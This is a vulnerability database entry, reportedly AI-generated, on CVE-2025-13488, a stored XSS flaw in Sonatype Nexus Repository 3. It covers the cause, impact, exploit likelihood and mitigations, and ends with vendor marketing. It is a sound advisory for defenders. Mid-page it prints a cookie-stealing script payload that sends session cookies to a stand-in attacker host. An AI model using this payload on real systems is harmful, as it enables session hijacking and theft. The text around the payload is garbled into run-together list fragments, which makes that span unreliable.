
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-13488 is a stored cross-site scripting (XSS) vulnerability in Sonatype Nexus Repository 3, caused by a regression introduced in version 3.83.0 that removed a security header from certain user-uploaded content served from repositories. It affects Nexus Repository 3 CE/Pro versions 3.83.0 through 3.86.2 (both Community and Professional editions). The vulnerability was disclosed on December 4, 2025, discovered by external researcher Seif Elsallamy (@0x21SAFE) via Sonatype's Bug Bounty Program, and fixed in version 3.87.0. It carries a CVSS v4.0 base score of 5.1 (Medium) (Sonatype Advisory, Feedly).
The root cause is a regression (CWE-79: Improper Neutralization of Input During Web Page Generation) introduced in version 3.83.0, where a security response header — specifically a Content-Security-Policy or Content-Disposition header — was inadvertently dropped for content served from repository paths (/repository/). Without this header, browsers may interpret uploaded files as active content rather than downloads, enabling stored XSS execution in the context of other authenticated users. An attacker must have authenticated access with repository upload privileges; exploitation requires a victim user to access or browse the malicious artifact in a browser. All repository types are affected: hosted, proxy, and group repositories (Sonatype Advisory).
Successful exploitation allows an authenticated attacker to inject and persistently store malicious scripts that execute in the browser context of other users who access the affected repository content. This can lead to privilege escalation within the Nexus Repository instance, session hijacking, credential theft, or unauthorized actions performed on behalf of victim users. Proxy repositories introduce an additional attack vector: if an upstream repository being proxied is compromised, malicious content could be delivered to users without the attacker needing direct upload access to the target Nexus instance (Sonatype Advisory).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported. The vulnerability requires authentication and upload privileges, limiting the attacker pool. The EPSS score is approximately 0.047% (very low probability of exploitation in the near term). The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The vulnerability was responsibly disclosed through Sonatype's Bug Bounty Program and no threat actor attribution has been identified (Sonatype Advisory, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>./service/rest/v1/components).https://nexus.example.com/repository/<repo-name>/<path-to-file>)./repository/ paths for HTML or script-like files..html, .htm, .svg, or other browser-renderable file types to hosted repositories by non-administrative accounts; subsequent access to those same paths by other users (especially administrators).Sonatype strongly recommends upgrading all affected Nexus Repository 3 instances to version 3.87.0 or later, which restores the missing security header. If immediate upgrade is not possible, two temporary mitigations are available: (1) Set the "Content Disposition" option in repository settings to attachment, which forces browsers to download files rather than render them; (2) Configure a reverse proxy (e.g., nginx or Apache) to inject a Content-Security-Policy: sandbox header for all responses served from /repository/ paths. Organizations should also audit upload permissions and restrict repository upload access to trusted users only (Sonatype Advisory, Sonatype Release Notes).
Sonatype disclosed the vulnerability through its official support portal and Bug Bounty Program, crediting researcher Seif Elsallamy (@0x21SAFE) for responsible disclosure. The advisory emphasizes the widespread use of Nexus Repository and encourages rapid remediation. No significant independent researcher commentary or broad media coverage has been identified beyond the vendor advisory.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."